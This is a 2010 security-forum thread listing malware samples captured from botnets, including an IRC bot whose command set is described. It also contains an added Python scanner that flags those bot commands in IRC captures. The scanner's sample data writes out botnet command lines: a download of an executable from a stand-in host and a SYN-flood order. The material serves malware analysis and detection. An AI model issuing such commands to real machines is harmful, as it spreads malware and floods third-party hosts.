Government Security
Network Security Resources

Binaries Captured From Botnets

malware botnet

#1 Banditrobber

Posted 20 June 2010 - 11:27 PM

I've been monitoring a few botnets for the last two or three days and I've already gathered a few malware specimens that you guys can analyze.

FILES:

FACEBOOK-PHOTOS-JPG-69463152346843.EXE
>> This is just a very simple downloader. It downloaded photo.exe

photo.exe
>> This is an IRC bot (from an update on a botnet I was watching)
>> Spreads via various messenger clients
>> Knows: .ss, .st, .updata, .im, .dl
>> .dl and .im are download commands, .ss is a SYN flood, .st is the command to join a localized channel, and .updata I assume is to update (although they used .im to update instead).

text.exe
>> I believe this is just a password stealer... BORING

bot.exe
>> My crappy amateur analysis tells me that this isn't actually a bot, but decide for yourself.
>> Might be some kind of cookie stealer

ed5fc88391_nce.exe
>> This is probably the most interesting piece of malware in this collection
>> When I was monitoring a botnet, somebody else tried to take it over
>> This was the file he tried to get the bots to update to (although, he failed)
>> Has anti-analysis protections built-in... Beyond my skill level
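The post above lists the command vocabulary of the IRC bot (.ss, .st, .updata, .im, .dl) and what each appears to do. The following is an added example, not code from the original poster: a small scanner that reads captured IRC PRIVMSG lines, flags the ones carrying those commands, and pulls out the URLs pushed by the download commands, which is what you would want to fetch for analysis when monitoring such a channel. The command-to-behaviour mapping is the poster's interpretation and is treated here as an assumption; the sample capture lines, nicks and hostnames are constructed for illustration.

```python
"""Flag botnet command traffic in captured IRC lines.

Added example, not from the original post. The command names (.ss, .st,
.updata, .im, .dl) and their meanings are taken from the post as the
poster read them (an assumption here); the capture lines below are
constructed, with invented nicks and hostnames.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Command vocabulary described in the post, mapped to the behaviour the
# poster attributed to each. Treat the mapping as an assumption.
BOT_COMMANDS = {
    ".ss": "syn-flood",
    ".st": "join-channel",
    ".updata": "update",
    ".im": "download",
    ".dl": "download",
}

# Standard IRC PRIVMSG shape: ":nick!user@host PRIVMSG target :text"
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)![^ ]+ PRIVMSG (?P<target>\S+) :(?P<text>.*)$"
)


@dataclass
class Hit:
    nick: str       # who issued the command (the controller)
    target: str     # channel or nick it was sent to
    command: str    # raw command token, e.g. ".dl"
    kind: str       # behaviour class from BOT_COMMANDS
    args: List[str]


def classify_line(line: str) -> Optional[Hit]:
    """Return a Hit if the line is a PRIVMSG whose first word is a bot command."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None  # not a PRIVMSG (NOTICE, PING, JOIN, ...) or malformed
    words = m.group("text").split()
    if not words or words[0].lower() not in BOT_COMMANDS:
        return None  # ordinary chatter
    cmd = words[0].lower()
    return Hit(m.group("nick"), m.group("target"), cmd, BOT_COMMANDS[cmd], words[1:])


def scan_capture(lines: List[str]) -> List[Hit]:
    """Classify every line of a capture, keeping only bot command hits."""
    return [h for h in (classify_line(l) for l in lines) if h is not None]


def downloaded_urls(hits: List[Hit]) -> List[str]:
    """URLs the controller pushed via .dl/.im: the samples worth fetching."""
    urls = []
    for h in hits:
        if h.kind == "download":
            urls.extend(
                a for a in h.args
                if a.lower().startswith(("http://", "https://", "ftp://"))
            )
    return urls


# Constructed sample capture (nicks, channel and hostnames are invented).
SAMPLE = [
    ":nick1!u@h PRIVMSG #chan :hello everyone",
    ":ctrl!op@example.invalid PRIVMSG #chan :.dl http://example.invalid/photo.exe",
    ":ctrl!op@example.invalid PRIVMSG #chan :.ss 192.0.2.10 80 600",
    ":ctrl!op@example.invalid PRIVMSG #chan :.st #chan-us",
    ":ctrl!op@example.invalid PRIVMSG #chan :.im http://example.invalid/ed5fc88391_nce.exe",
    ":server NOTICE * :*** Looking up your hostname",
]

if __name__ == "__main__":
    hits = scan_capture(SAMPLE)
    for h in hits:
        print(f"{h.nick} -> {h.target}: {h.command} ({h.kind}) {' '.join(h.args)}")
    print("download targets:", downloaded_urls(hits))
```

Because the scanner keys on the first word of the message body rather than on full-line patterns, it also catches the same commands when they are sent by private message to a single bot instead of to the channel, and the `kind` field lets you alert on the SYN-flood command separately from the update and download commands.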

#2 infiltrator

Posted 23 June 2010 - 01:43 AM

What are you using to monitor these botnets?